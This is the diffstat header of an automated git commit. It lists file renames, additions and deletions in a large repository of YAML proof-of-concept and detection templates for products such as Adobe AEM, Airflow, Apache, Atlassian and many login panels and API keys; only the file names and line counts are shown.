From e9942e3caba55fdf3ee173495d3bb9a7a62f1410 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sun, 9 Jun 2024 12:33:22 +0000
Subject: [PATCH] 20240609
---
date.txt | 2 +-
poc.txt | 3008 +-
poc/adobe/adobe-coldfusion-detect-82.yaml | 62 -
poc/adobe/adobe-coldfusion-detect-83.yaml | 9 +-
.../adobe-coldfusion-error-detect-86.yaml | 29 +
...aml => adobe-coldfusion-error-detect.yaml} | 0
poc/adobe/adobe-component-login-89.yaml | 32 +
poc/adobe/adobe-component-login-90.yaml | 31 -
poc/adobe/adobe-component-login-91.yaml | 23 +
poc/adobe/adobe-component-login-92.yaml | 8 +-
...ml => adobe-connect-central-login-96.yaml} | 0
.../adobe-connect-username-exposure-100.yaml | 27 -
.../adobe-connect-username-exposure-101.yaml | 52 +-
.../adobe-connect-username-exposure-98.yaml | 3 +-
poc/adobe/adobe-connect-version-104.yaml | 32 -
...on-102.yaml => adobe-connect-version.yaml} | 0
.../adobe-experience-manager-login-105.yaml | 33 -
.../adobe-experience-manager-login-106.yaml | 23 +
.../adobe-experience-manager-login-109.yaml | 10 +-
poc/adobe/adobe-media-server-114.yaml | 23 +
poc/adobe/adobe-media-server-115.yaml | 11 +-
poc/adobe/adobe-media-server.yaml | 30 -
poc/adobe/aem-bg-servlet-129.yaml | 29 -
poc/adobe/aem-bg-servlet.yaml | 24 +
poc/adobe/aem-cached-pages.yaml | 17 +-
....yaml => aem-default-get-servlet-135.yaml} | 0
poc/adobe/aem-default-login-140.yaml | 56 -
poc/adobe/aem-default-login-141.yaml | 8 +-
poc/adobe/aem-default-login-142.yaml | 12 +-
poc/adobe/aem-gql-servlet-149.yaml | 56 -
poc/adobe/aem-gql-servlet-150.yaml | 26 +
poc/adobe/aem-groovyconsole-154.yaml | 28 -
poc/adobe/aem-groovyconsole-155.yaml | 15 +-
poc/adobe/aem-jcr-querybuilder-162.yaml | 28 -
poc/adobe/aem-jcr-querybuilder-164.yaml | 54 +-
poc/adobe/aem-jcr-querybuilder-165.yaml | 31 +
poc/adobe/aem-jcr-querybuilder-166.yaml | 7 +-
...tus-169.yaml => aem-login-status-167.yaml} | 0
poc/adobe/aem-merge-metadata-servlet-172.yaml | 10 +-
poc/adobe/aem-merge-metadata-servlet-174.yaml | 24 -
...m-querybuilder-internal-path-read-179.yaml | 30 +
...m-querybuilder-internal-path-read-180.yaml | 24 -
.../aem-querybuilder-json-servlet-182.yaml | 72 +-
poc/adobe/aem-secrets.yaml | 44 +
poc/adobe/aem-setpreferences-xss.yaml | 30 -
poc/adobe/aem-userinfo-servlet-192.yaml | 32 -
poc/adobe/aem-userinfo-servlet-193.yaml | 25 +
poc/adobe/aem-userinfo-servlet.yaml | 10 +-
...ml => aem-xss-childlist-selector-198.yaml} | 0
poc/adobe/aem-xss-childlist-selector.yaml | 37 -
poc/adobe/possible-AEM-secrets.yaml | 46 -
.../airflow-configuration-exposure-230.yaml | 28 +
.../airflow-configuration-exposure.yaml | 16 -
poc/airflow/airflow-debug-231.yaml | 26 +
poc/airflow/airflow-debug-233.yaml | 29 -
poc/airflow/airflow-debug.yaml | 10 +-
poc/airflow/airflow-default-login-236.yaml | 21 +-
poc/airflow/airflow-detect-239.yaml | 24 -
poc/airflow/airflow-detect-240.yaml | 24 +
poc/airflow/airflow-panel-242.yaml | 24 +
...-panel-241.yaml => airflow-panel-244.yaml} | 0
poc/airflow/airflow-panel-245.yaml | 13 +-
.../unauthenticated-airflow-10884.yaml | 27 +
.../unauthenticated-airflow-10886.yaml | 23 -
poc/airflow/unauthenticated-airflow.yaml | 12 +-
poc/apache/apache-answer-detect.yaml | 45 +
poc/apache/apache-apisix-panel-336.yaml | 7 +-
poc/apache/apache-apisix-panel-337.yaml | 25 -
poc/apache/apache-apisix-panel-338.yaml | 30 +
poc/apache/apache-axis-detect-339.yaml | 32 +
...etect.yaml => apache-axis-detect-341.yaml} | 0
poc/apache/apache-cocoon-detect-342.yaml | 33 -
poc/apache/apache-cocoon-detect.yaml | 27 +
...che-detect.yaml => apache-detect-346.yaml} | 0
poc/apache/apache-detect-348.yaml | 60 +-
poc/apache/apache-flink-unauth-rce-355.yaml | 50 -
poc/apache/apache-httpd-rce-362.yaml | 41 -
poc/apache/apache-httpd-rce.yaml | 13 +-
poc/apache/apache-solr-file-read-368.yaml | 43 +
poc/apache/apache-solr-file-read-369.yaml | 50 -
poc/apache/apache-solr-log4j-rce-372.yaml | 36 +
poc/apache/apache-solr-log4j-rce.yaml | 63 +-
poc/apache/apache-storm-unauth.yaml | 13 +-
poc/apache/default-apache-test-all-6814.yaml | 4 +-
poc/apache/default-apache-test-all.yaml | 29 -
poc/apache/default-apache-test-page-6816.yaml | 6 +-
poc/apache/default-apache-test-page-6818.yaml | 5 +-
poc/apache/default-apache2-page-6804.yaml | 8 +-
poc/apache/default-apache2-page-6806.yaml | 5 +-
.../default-apache2-ubuntu-page-6810.yaml | 6 +-
poc/apache/default-apache2-ubuntu-page.yaml | 17 -
poc/api/alfacgiapi-wordpress-256.yaml | 62 +-
poc/api/alfacgiapi-wordpress.yaml | 33 -
poc/api/apache-apisix-panel-336.yaml | 7 +-
poc/api/apache-apisix-panel-337.yaml | 25 -
poc/api/apache-apisix-panel-338.yaml | 30 +
poc/api/api-abstractapi-383.yaml | 25 +
...seipdb-384.yaml => api-abuseipdb-385.yaml} | 0
poc/api/api-abuseipdb.yaml | 31 +
poc/api/api-accuweather-386.yaml | 29 -
poc/api/api-accuweather.yaml | 23 +
poc/api/api-adafruit-io-387.yaml | 30 -
poc/api/api-adafruit-io.yaml | 24 +
poc/api/api-alienvault-388.yaml | 32 -
poc/api/api-apigee-edge-391.yaml | 36 -
poc/api/api-apigee-edge.yaml | 29 +
poc/api/api-appveyor-392.yaml | 31 -
poc/api/api-appveyor.yaml | 25 +
poc/api/api-bible-394.yaml | 33 +
poc/api/api-bible.yaml | 28 -
poc/api/api-bingmaps.yaml | 19 -
poc/api/api-bitly-396.yaml | 17 +-
poc/api/api-bitrise-397.yaml | 33 +
poc/api/api-bitrise.yaml | 28 -
poc/api/api-block-400.yaml | 31 -
poc/api/api-block.yaml | 26 +
poc/api/api-blockchain-399.yaml | 8 +-
poc/api/api-blockchain.yaml | 27 -
poc/api/api-buildkite-402.yaml | 14 +-
poc/api/api-buildkite.yaml | 21 -
poc/api/api-buttercms-403.yaml | 22 +-
poc/api/api-calendly-404.yaml | 14 +-
poc/api/api-circleci-406.yaml | 12 +-
poc/api/api-circleci.yaml | 18 -
poc/api/api-coinapi-408.yaml | 33 -
poc/api/api-coinapi.yaml | 28 +
poc/api/api-cooperhewitt-411.yaml | 10 +-
poc/api/api-debounce-414.yaml | 30 -
poc/api/api-debounce.yaml | 25 +
poc/api/api-deviantart-415.yaml | 27 +
poc/api/api-deviantart.yaml | 21 -
poc/api/api-dribbble-416.yaml | 10 +-
...pi-dribbble.yaml => api-dribbble-417.yaml} | 0
poc/api/api-dropbox-418.yaml | 10 +-
poc/api/api-europeana-419.yaml | 10 +-
poc/api/api-europeana-420.yaml | 21 +
poc/api/api-europeana-421.yaml | 12 +-
poc/api/api-fastly-424.yaml | 25 +
poc/api/{api-fastly.yml => api-fastly.yaml} | 0
poc/api/api-festivo-425.yaml | 31 +
poc/api/api-festivo.yaml | 26 -
poc/api/api-fortitoken-cloud.yaml | 11 +-
poc/api/api-fullhunt-428.yaml | 34 -
poc/api/api-fullhunt.yaml | 29 +
poc/api/api-google-drive-432.yaml | 28 +
poc/api/api-google-drive.yaml | 23 -
poc/api/api-hirak-rates-436.yaml | 32 -
poc/api/api-hirak-rates.yaml | 27 +
poc/api/api-hubspot.yaml | 21 -
poc/api/api-iconfinder-439.yaml | 34 +
poc/api/api-improvmx-440.yaml | 35 -
poc/api/api-improvmx.yaml | 30 +
poc/api/api-instagram.yaml | 10 +-
poc/api/api-instatus-442.yaml | 34 -
poc/api/api-instatus.yaml | 29 +
poc/api/api-intercom-443.yaml | 30 +
poc/api/api-intercom.yaml | 24 -
...{api-ipstack.yaml => api-ipstack-444.yaml} | 0
poc/api/api-iterable-445.yaml | 23 +
poc/api/api-iterable.yaml | 24 -
...-jumpcloud.yaml => api-jumpcloud-446.yaml} | 0
poc/api/api-linkfinder.yaml | 2 +-
...pi-lokalise-452.yaml => api-lokalise.yaml} | 0
poc/api/api-mailchimp-454.yaml | 21 -
poc/api/api-mailchimp.yaml | 3 +-
poc/api/api-mailgun-455.yaml | 14 +-
poc/api/api-malshare-456.yaml | 2 +-
poc/api/api-malshare.yaml | 24 +
poc/api/api-malwarebazaar-458.yaml | 40 -
poc/api/api-malwarebazaar-459.yaml | 12 +-
poc/api/api-mapbox-465.yaml | 10 +-
poc/api/api-mapbox.yaml | 19 -
poc/api/api-mojoauth-466.yaml | 33 -
poc/api/api-mojoauth.yaml | 28 +
poc/api/api-mywot-467.yaml | 10 +-
poc/api/api-mywot-468.yaml | 27 -
poc/api/api-netlify-470.yaml | 31 -
poc/api/api-netlify.yaml | 25 +
poc/api/api-openweather-473.yaml | 13 +-
poc/api/api-openweather.yaml | 18 -
...-pagerduty.yaml => api-pagerduty-475.yaml} | 0
poc/api/api-pendo.yaml | 23 +
poc/api/api-petfinder-480.yaml | 36 +
poc/api/api-petfinder.yaml | 31 -
...acker.yaml => api-pivotaltracker-482.yaml} | 0
poc/api/api-postmark-483.yaml | 26 -
poc/api/api-postmark.yaml | 15 +-
poc/api/api-rijksmuseum.yaml | 25 -
poc/api/api-scanii-487.yaml | 10 +-
poc/api/api-scanii-488.yaml | 26 +
poc/api/api-sendgrid-489.yaml | 23 -
poc/api/api-sendgrid.yaml | 11 +-
.../{api-slack-493.yaml => api-slack.yaml} | 0
poc/api/api-sonarcloud-494.yaml | 5 +-
poc/api/api-sonarcloud.yaml | 21 +
poc/api/api-spotify-495.yaml | 31 -
poc/api/api-spotify.yaml | 25 +
.../{api-square-496.yaml => api-square.yaml} | 0
poc/api/api-sslmate-497.yaml | 33 -
poc/api/api-sslmate.yaml | 28 +
poc/api/api-stripe-499.yaml | 25 -
poc/api/api-stripe.yaml | 13 +-
poc/api/api-taiga-501.yaml | 30 -
poc/api/api-taiga.yaml | 24 +
poc/api/api-thecatapi-502.yaml | 32 -
poc/api/api-thecatapi-503.yaml | 10 +-
poc/api/api-tink-504.yaml | 31 -
poc/api/api-tink.yaml | 25 +
poc/api/api-travisci.yaml | 22 -
poc/api/api-virustotal-511.yaml | 15 +-
poc/api/api-virustotal-512.yaml | 13 +-
poc/api/api-visualstudio-513.yaml | 23 -
poc/api/api-visualstudio.yaml | 26 +
poc/api/api-wakatime-514.yaml | 14 +-
poc/api/api-wakatime.yaml | 19 +
poc/api/api-weglot-516.yaml | 24 -
poc/api/api-weglot.yaml | 1 +
poc/api/api-wordcloud-517.yaml | 45 -
poc/api/api-wordcloud-518.yaml | 10 +-
poc/api/api-youtube-519.yaml | 28 -
poc/api/api-youtube.yaml | 22 +
poc/api/apiman-panel-460.yaml | 11 +-
poc/api/apiman-panel-462.yaml | 30 -
poc/api/apisix-default-login-492.yaml | 20 +-
poc/api/arcgis-rest-api.yaml | 15 +-
poc/api/bems-api-lfi-709.yaml | 25 -
poc/api/bems-api-lfi-711.yaml | 22 +-
poc/api/bems-api-lfi-712.yaml | 24 -
poc/api/burp-api-detect-810.yaml | 28 +
poc/api/burp-api-detect-812.yaml | 27 -
poc/api/burp-api-detect.yaml | 3 +-
poc/api/etcd-unauthenticated-api.yaml | 26 +-
poc/api/exposed-docker-api-7299.yaml | 12 +-
poc/api/exposed-glances-api-7308.yaml | 56 +-
poc/api/fastapi-docs-7398.yaml | 22 +
poc/api/fastapi-docs-7399.yaml | 44 +-
poc/api/gitlab-api-user-enum-7668.yaml | 7 +-
poc/api/gitlab-api-user-enum.yaml | 16 +-
poc/api/gmail-api-client-secrets-7741.yaml | 40 -
poc/api/google-api-key-7768.yaml | 9 +-
poc/api/graylog-api-browser-7846.yaml | 22 +
poc/api/graylog-api-browser.yaml | 23 -
...cd-unauthenticated-api-data-leak-8056.yaml | 28 -
...tp-etcd-unauthenticated-api-data-leak.yaml | 38 +
poc/api/kube-api-namespaces-8505.yaml | 25 +
poc/api/kube-api-namespaces-8506.yaml | 6 +-
poc/api/kube-api-nodes-8507.yaml | 18 +-
poc/api/kube-api-nodes-8508.yaml | 25 -
poc/api/kube-api-nodes.yaml | 22 -
poc/api/kube-api-pods-8510.yaml | 6 +-
poc/api/kube-api-pods.yaml | 22 +
poc/api/kube-api-services-8513.yaml | 9 +-
poc/api/kube-api-services-8514.yaml | 6 +-
poc/api/magento-2-exposed-api-8687.yaml | 5 +-
poc/api/magento-2-exposed-api-8688.yaml | 45 +
poc/api/mailchimp-api-key-8722.yaml | 20 +-
poc/api/mailchimp-api-key-8726.yaml | 20 -
poc/api/mailchimp-api.yaml | 3 +-
...gun-api-11855.yaml => mailgun-api(1).yaml} | 0
poc/api/pictatic-api-key-9576.yaml | 5 +-
poc/api/pictatic-api-key.yaml | 4 -
poc/api/sendgrid-api-key-10140.yaml | 2 +-
poc/api/sendgrid-api.yaml | 4 +
poc/api/slack-api.yaml | 3 +-
...3.yaml => strapi-documentation-10542.yaml} | 0
poc/api/strapi-page-10544.yaml | 3 +-
...trapi-page.yaml => strapi-page-10545.yaml} | 0
poc/api/stripe-api-key(1).yaml | 16 +
poc/api/stripe-api-key-11869.yaml | 13 -
poc/api/twilio-api-10860.yaml | 13 +
poc/api/twilio-api-10861.yaml | 16 -
poc/api/twilio-api.yaml | 5 +-
poc/api/unauth-spark-api-10963.yaml | 14 +-
poc/api/unauth-spark-api.yaml | 30 -
poc/api/wadl-api-11082.yaml | 38 -
poc/api/wadl-api-11084.yaml | 34 +-
poc/api/wadl-api-11085.yaml | 5 -
poc/api/wsdl-api-11632.yaml | 18 +-
poc/api/wsdl-api-11634.yaml | 15 +
poc/api/wso2-apimanager-detect-11638.yaml | 19 -
poc/api/yapi-rce-11724.yaml | 27 +-
poc/api/yapi-rce-11725.yaml | 86 +
poc/atlassian/atlassian-bamboo-panel.yaml | 44 +
poc/atlassian/atlassian-crowd-panel-583.yaml | 25 -
poc/atlassian/bitbucket-takeover-738.yaml | 21 +
poc/atlassian/bitbucket-takeover-739.yaml | 9 +-
poc/atlassian/bitbucket-takeover-740.yaml | 21 -
poc/atlassian/bitbucket-takeover.yaml | 19 +-
poc/atlassian/confluence-detect-1186.yaml | 14 +-
poc/atlassian/confluence-detect-1187.yaml | 40 -
poc/atlassian/confluence-detect-1189.yaml | 41 +
.../confluence-ssrf-sharelinks-1191.yaml | 31 +-
.../confluence-ssrf-sharelinks-1192.yaml | 44 +
.../confluence-ssrf-sharelinks-1193.yaml | 36 -
poc/atlassian/jira-detect-8313.yaml | 25 +
poc/atlassian/jira-detect-8314.yaml | 29 -
poc/atlassian/jira-detect-8316.yaml | 4 +
poc/atlassian/jira-login-default.yaml | 8 +-
.../jira-unauthenticated-dashboards-8323.yaml | 11 +-
.../jira-unauthenticated-dashboards-8327.yaml | 16 +-
...nauthenticated-installed-gadgets-8328.yaml | 4 -
...nauthenticated-installed-gadgets-8330.yaml | 31 +
...-unauthenticated-popular-filters-8331.yaml | 23 -
.../jira-unauthenticated-popular-filters.yaml | 5 +-
...nauthenticated-projectcategories-8334.yaml | 7 +-
...ra-unauthenticated-projectcategories.yaml} | 0
...jira-unauthenticated-user-picker-8341.yaml | 10 +-
poc/atlassian/jira_user_piker (copy 1).yaml | 22 +
poc/auth/AVTECH-login-bypass.yaml | 2 +
poc/auth/Dynatrace-token (copy 1).yaml | 15 -
poc/auth/Dynatrace-token.yaml | 6 +-
poc/auth/JeeSite-default-login.yaml | 5 +-
poc/auth/Mantis-Default_login.yaml | 47 +
poc/auth/Redmine-Default-Login.yaml | 21 -
...login-23.yaml => acemanager-login-24.yaml} | 0
poc/auth/activemq-default-login-44.yaml | 33 -
poc/auth/activemq-default-login-46.yaml | 3 +-
poc/auth/activemq-default-login-48.yaml | 29 +
poc/auth/adobe-component-login-89.yaml | 32 +
poc/auth/adobe-component-login-90.yaml | 31 -
poc/auth/adobe-component-login-91.yaml | 23 +
poc/auth/adobe-component-login-92.yaml | 8 +-
...ml => adobe-connect-central-login-96.yaml} | 0
.../adobe-experience-manager-login-105.yaml | 33 -
.../adobe-experience-manager-login-106.yaml | 23 +
.../adobe-experience-manager-login-109.yaml | 10 +-
poc/auth/aem-default-login-140.yaml | 56 -
poc/auth/aem-default-login-141.yaml | 8 +-
poc/auth/aem-default-login-142.yaml | 12 +-
...tus-169.yaml => aem-login-status-167.yaml} | 0
poc/auth/aem-secrets.yaml | 44 +
...aml => aims-password-mgmt-client-219.yaml} | 0
poc/auth/aims-password-mgmt-client-221.yaml | 17 +
poc/auth/aims-password-portal-225.yaml | 22 +
poc/auth/aims-password-portal.yaml | 2 +-
poc/auth/airflow-default-login-236.yaml | 21 +-
poc/auth/alibaba-mongoshake-unauth-268.yaml | 27 +
poc/auth/alibaba-mongoshake-unauth-270.yaml | 10 +-
poc/auth/alphaweb-default-login.yaml | 35 -
poc/auth/amazon-mws-auth-token-11845.yaml | 11 +-
poc/auth/amazon-mws-auth-token-282.yaml | 6 +-
poc/auth/amazon-mws-auth-token-283.yaml | 11 +-
poc/auth/ambari-default-login-287.yaml | 35 -
poc/auth/ambari-default-login-289.yaml | 35 +
poc/auth/ambari-default-login-290.yaml | 11 +-
poc/auth/amcrest-login-297.yaml | 11 +-
poc/auth/ametys-admin-login-300.yaml | 12 +-
poc/auth/ametys-admin-login-301.yaml | 31 -
poc/auth/ametys-admin-login-302.yaml | 36 +
poc/auth/apache-flink-unauth-rce-355.yaml | 50 -
poc/auth/apache-storm-unauth.yaml | 13 +-
poc/auth/apc-ups-login.yaml | 24 -
poc/auth/api-fortitoken-cloud.yaml | 11 +-
poc/auth/api-mojoauth-466.yaml | 33 -
poc/auth/api-mojoauth.yaml | 28 +
poc/auth/apisix-default-login-492.yaml | 20 +-
poc/auth/apollo-default-login-520.yaml | 14 +-
...gin-521.yaml => apollo-default-login.yaml} | 0
poc/auth/apple-app-site-association-524.yaml | 6 +-
poc/auth/argocd-login-534.yaml | 35 -
...rgocd-login.yaml => argocd-login-536.yaml} | 0
poc/auth/arl-default-login-537.yaml | 44 -
poc/auth/arl-default-login-539.yaml | 7 +-
poc/auth/arl-default-login-540.yaml | 9 +-
poc/auth/arl-default-password.yaml | 4 +
poc/auth/atvise-login.yaml | 29 -
poc/auth/authelia-panel.yaml | 33 +
poc/auth/avatier-password-management-605.yaml | 37 -
....yaml => avatier_password_management.yaml} | 0
poc/auth/aws-access-key-value-624.yaml | 22 +
poc/auth/aws-opensearch-login-649.yaml | 24 +
poc/auth/aws-opensearch-login-650.yaml | 25 -
poc/auth/aws-opensearch-login.yaml | 3 +-
.../axiom-digitalocean-key-exposure-666.yaml | 8 +-
...l => axiom-digitalocean-key-exposure.yaml} | 0
poc/auth/azkaban-default-login-674.yaml | 6 +-
...in-673.yaml => azkaban-default-login.yaml} | 0
...687.yaml => basic-auth-detection-689.yaml} | 0
poc/auth/bazarr-login-702.yaml | 19 +
poc/auth/beyondtrust-login-server.yaml | 73 +-
...-726.yaml => bigbluebutton-login-724.yaml} | 0
poc/auth/blue-iris-login-751.yaml | 31 -
poc/auth/blue-iris-login-753.yaml | 15 +-
poc/auth/blue-iris-login-754.yaml | 22 +
poc/auth/braintree-access-token-773.yaml | 4 +-
poc/auth/braintree-access-token.yaml | 17 -
poc/auth/branch-key-774.yaml | 3 +-
...l => brother-unauthorized-access-793.yaml} | 0
poc/auth/brother-unauthorized-access.yaml | 50 +-
poc/auth/canal-default-login-846.yaml | 44 +
poc/auth/canal-default-login-848.yaml | 2 +-
poc/auth/canal-default-login-849.yaml | 35 -
poc/auth/chinaunicom-default-login-906.yaml | 38 -
poc/auth/chinaunicom-default-login-908.yaml | 8 +-
...chinaunicom-modem-default-credentials.yaml | 2 -
poc/auth/cisco-finesse-login-938.yaml | 22 -
poc/auth/cisco-finesse-login-940.yaml | 23 +
poc/auth/cisco-integrated-login-941.yaml | 3 +-
poc/auth/cisco-systems-login-973.yaml | 25 +
poc/auth/cisco-systems-login-975.yaml | 32 -
poc/auth/cisco-systems-login.yaml | 12 +-
...-980.yaml => cisco-ucs-kvm-login-979.yaml} | 0
poc/auth/cisco-ucs-kvm-login.yaml | 13 +-
poc/auth/clickhouse-unauth-1002.yaml | 25 +
poc/auth/clickhouse-unauth-1003.yaml | 26 -
poc/auth/clickhouse-unauth-1004.yaml | 8 +-
poc/auth/clickhouse-unauth.yaml | 14 +-
...9.yaml => cobbler-default-login-1118.yaml} | 0
poc/auth/cobbler-default-login.yaml | 72 -
poc/auth/codian-mcu-login-1139.yaml | 34 -
.../coldfusion-administrator-login-1145.yaml | 49 +-
.../commax-credentials-disclosure-1158.yaml | 7 +-
.../commax-credentials-disclosure-1160.yaml | 36 +
poc/auth/cortex-xsoar-login-1225.yaml | 5 +-
poc/auth/credential-exposure-1249.yaml | 7 +-
poc/auth/credentials-1257.yaml | 16 +
poc/auth/credentials-1258.yaml | 16 -
poc/auth/credentials-disclosure-1255.yaml | 4152 +-
poc/auth/credentials-disclosure-1256.yaml | 708 +
poc/auth/credentials.yaml | 11 +-
poc/auth/crush-ftp-login-1273.yaml | 21 +-
poc/auth/crush-ftp-login-1275.yaml | 23 +
poc/auth/crush-ftp-login.yaml | 16 +-
poc/auth/crushftp-default-login.yaml | 59 +
.../cs-cart-unauthenticated-lfi-1284.yaml | 26 +
....yaml => cs-cart-unauthenticated-lfi.yaml} | 0
poc/auth/cs141-default-login-1277.yaml | 13 +-
poc/auth/cs141-default-login-1279.yaml | 18 +-
poc/auth/cx-cloud-login-6765.yaml | 4 +-
poc/auth/dbeaver-credentials-6780.yaml | 42 -
poc/auth/dbeaver-credentials-6782.yaml | 11 +-
poc/auth/dell-idrac-default-login-6945.yaml | 2 +-
...943.yaml => dell-idrac-default-login.yaml} | 0
poc/auth/dell-idrac9-default-login-6930.yaml | 32 +-
poc/auth/dell-idrac9-default-login-6932.yaml | 11 +-
poc/auth/dell-openmanager-login-6949.yaml | 27 -
poc/auth/dell-openmanager-login-6951.yaml | 23 -
poc/auth/dericam-login-6962.yaml | 9 +-
poc/auth/dericam-login.yaml | 18 +-
poc/auth/dir-850l-login-panel.yaml | 19 +-
poc/auth/directadmin-login-panel-7000.yaml | 23 +
poc/auth/django-secret-key.yaml | 31 -
poc/auth/django-secret.key.yaml | 62 +
.../dolphinscheduler-default-login-7072.yaml | 15 +-
.../dolphinscheduler-default-login-7073.yaml | 48 +
poc/auth/druid-default-login-7096.yaml | 2 +-
poc/auth/druid-default-login.yaml | 17 +-
...ml => dubbo-admin-default-login-7120.yaml} | 0
poc/auth/dubbo-admin-default-login-7121.yaml | 18 +-
poc/auth/dvwa-default-login-7129.yaml | 7 -
...ogin-7127.yaml => dvwa-default-login.yaml} | 0
.../dvwa-headless-automatic-login-7130.yaml | 42 -
.../dvwa-headless-automatic-login-7131.yaml | 42 +
.../dvwa-headless-automatic-login-7133.yaml | 9 +
poc/auth/dynatrace-token-7145.yaml | 13 +
poc/auth/dynatrace-token-7146.yaml | 16 -
poc/auth/emcecom-default-login-7211.yaml | 43 -
poc/auth/emcecom-default-login-7212.yaml | 7 +-
poc/auth/emqx-default-login-7222.yaml | 35 +
poc/auth/emqx-default-login.yaml | 5 +-
poc/auth/ems-login-panel-7223.yaml | 18 -
.../enable-secret-for-password-user-and-.yaml | 4 +-
poc/auth/epmp-login-7229.yaml | 3 +-
poc/auth/epmp-login.yaml | 24 -
poc/auth/etcd-keys-7261.yaml | 25 -
poc/auth/etcd-keys-7262.yaml | 26 -
poc/auth/etcd-keys.yaml | 6 +-
poc/auth/etcd-unauthenticated-api.yaml | 26 +-
poc/auth/exacqvision-default-login-7275.yaml | 17 +-
...77.yaml => exacqvision-default-login.yaml} | 0
poc/auth/faraday-login-7395.yaml | 24 -
poc/auth/faraday-login-7397.yaml | 20 -
poc/auth/fatpipe-auth-bypass-7431.yaml | 42 +
poc/auth/fatpipe-auth-bypass.yaml | 33 -
poc/auth/fcm-server-key.yaml | 14 +-
.../fireware-xtm-user-authentication.yaml | 13 +-
poc/auth/flir-default-login-7514.yaml | 50 -
poc/auth/flir-default-login.yaml | 35 +
poc/auth/frp-default-login-7556.yaml | 40 -
poc/auth/frp-default-login-7557.yaml | 21 +-
poc/auth/ftp-credentials-exposure-7568.yaml | 37 -
poc/auth/ftp-credentials-exposure.yaml | 22 +
poc/auth/ftp-weak-credentials-7570.yaml | 43 -
poc/auth/ftp-weak-credentials.yaml | 23 +-
poc/auth/fuelcms-default-login-7571.yaml | 16 +-
poc/auth/fuelcms-default-login-7572.yaml | 20 +-
poc/auth/general-tokens-7580.yaml | 15 +-
poc/auth/general-tokens-7583.yaml | 6 +-
poc/auth/git-credentials-disclosure-7641.yaml | 32 +
...0.yaml => git-credentials-disclosure.yaml} | 0
poc/auth/gitea-login.yaml | 13 +-
poc/auth/gitlab-public-signup-7683.yaml | 26 -
.../gitlab-uninitialized-password-7694.yaml | 11 +-
.../gitlab-uninitialized-password-7695.yaml | 10 +-
poc/auth/gitlab-weak-login-7707.yaml | 12 +-
poc/auth/gitlab-weak-login.yaml | 56 -
poc/auth/gloo-unauth-7722.yaml | 13 +-
poc/auth/glpi-authentication-7730.yaml | 25 -
poc/auth/glpi-default-login-7732.yaml | 15 +-
poc/auth/glpi-default-login.yaml | 67 +
poc/auth/gmail-api-client-secrets-7741.yaml | 40 -
poc/auth/gocd-encryption-key.yaml | 8 +-
poc/auth/google-api-key-7768.yaml | 9 +-
poc/auth/google-earth-dlogin-7781.yaml | 31 +
poc/auth/google-earth-dlogin.yaml | 17 +-
...ebook-secrets.yaml => google-secrets.yaml} | 0
poc/auth/gophish-default-login-7792.yaml | 14 +-
poc/auth/gophish-default-login-7793.yaml | 19 +-
poc/auth/gophish-login-7795.yaml | 20 -
poc/auth/gophish-login-7796.yaml | 23 +
poc/auth/grafana-public-signup-7814.yaml | 30 +
poc/auth/grafana-public-signup.yaml | 14 +-
poc/auth/guacamole-default-login-7858.yaml | 12 +-
poc/auth/guacamole-default-login-7859.yaml | 38 +
poc/auth/guacamole-default-login-7861.yaml | 10 +-
poc/auth/hivemanager-login-panel-7966.yaml | 3 +-
poc/auth/hongdian-default-login-7997.yaml | 58 +
poc/auth/hongdian-default-login-7999.yaml | 50 -
.../hp-ilo-serial-key-disclosure-8023.yaml | 24 -
.../hp-ilo-serial-key-disclosure-8025.yaml | 27 +
poc/auth/hp-ilo-serial-key-disclosure.yaml | 7 +-
.../hpe-system-management-login-8017.yaml | 27 +
poc/auth/hpe-system-management-login.yaml | 13 +-
poc/auth/hrsale-unauthenticated-lfi-8039.yaml | 23 +-
poc/auth/hrsale-unauthenticated-lfi-8041.yaml | 9 +-
poc/auth/htpasswd-detection-8046.yaml | 25 +
...cd-unauthenticated-api-data-leak-8056.yaml | 28 -
...tp-etcd-unauthenticated-api-data-leak.yaml | 38 +
.../huawei-HG532e-default-router-login.yaml | 38 -
...awei-hg532e-default-router-login-8063.yaml | 9 +-
poc/auth/huawei-router-auth-bypass-8073.yaml | 20 +-
poc/auth/huawei-router-auth-bypass-8076.yaml | 37 +
poc/auth/hue-default-credential-8080.yaml | 16 +-
poc/auth/hue-default-credential-8081.yaml | 62 -
poc/auth/hue-default-credential.yaml | 62 -
...gin-8110.yaml => ibm-note-login-8112.yaml} | 0
.../ibm-storage-default-credential-8124.yaml | 12 +-
.../ibm-storage-default-credential-8125.yaml | 21 +-
poc/auth/icinga-web-login-8134.yaml | 22 +
poc/auth/icinga-web-login-8137.yaml | 23 -
poc/auth/icinga-web-login.yaml | 13 +-
.../idemia-biometrics-default-login-8138.yaml | 17 +-
.../idemia-biometrics-default-login-8139.yaml | 33 -
...idemia-biometrics-default-login-8141.yaml} | 0
poc/auth/iptime-default-login-8193.yaml | 48 -
poc/auth/iptime-default-login-8194.yaml | 9 -
poc/auth/jellyseerr-login-panel.yaml | 39 -
poc/auth/jenkins-login-8277.yaml | 27 -
poc/auth/jenkins-login-8280.yaml | 18 +
poc/auth/jfrog-unauth-build-exposed-8299.yaml | 30 +
poc/auth/jfrog-unauth-build-exposed-8302.yaml | 8 +-
poc/auth/jinher-oa-default-login-8311.yaml | 10 +-
poc/auth/jinher-oa-default-login-8312.yaml | 52 +
poc/auth/jira-login-default.yaml | 8 +-
.../jira-unauthenticated-dashboards-8323.yaml | 11 +-
.../jira-unauthenticated-dashboards-8327.yaml | 16 +-
...nauthenticated-installed-gadgets-8328.yaml | 4 -
...nauthenticated-installed-gadgets-8330.yaml | 31 +
...-unauthenticated-popular-filters-8331.yaml | 23 -
.../jira-unauthenticated-popular-filters.yaml | 5 +-
...nauthenticated-projectcategories-8334.yaml | 7 +-
...ra-unauthenticated-projectcategories.yaml} | 0
...jira-unauthenticated-user-picker-8341.yaml | 10 +-
poc/auth/jmx-default-login-8355.yaml | 38 -
poc/auth/jmx-default-login.yaml | 42 +
.../jolokia-unauthenticated-lfi-8366.yaml | 31 +
....yaml => jolokia-unauthenticated-lfi.yaml} | 0
poc/auth/jupyter-ipython-unauth-8402.yaml | 21 -
poc/auth/jupyter-ipython-unauth-8405.yaml | 15 +-
poc/auth/jupyterhub-default-login-8399.yaml | 10 +-
poc/auth/jupyterhub-default-login-8400.yaml | 35 -
poc/auth/jwt-token-8408.yaml | 13 +-
.../{jwt-token-8410.yaml => jwt-token.yaml} | 0
poc/auth/kafka-center-default-login-8415.yaml | 13 +-
poc/auth/kafka-center-default-login.yaml | 42 +
poc/auth/kafka-center-login.yaml | 19 +-
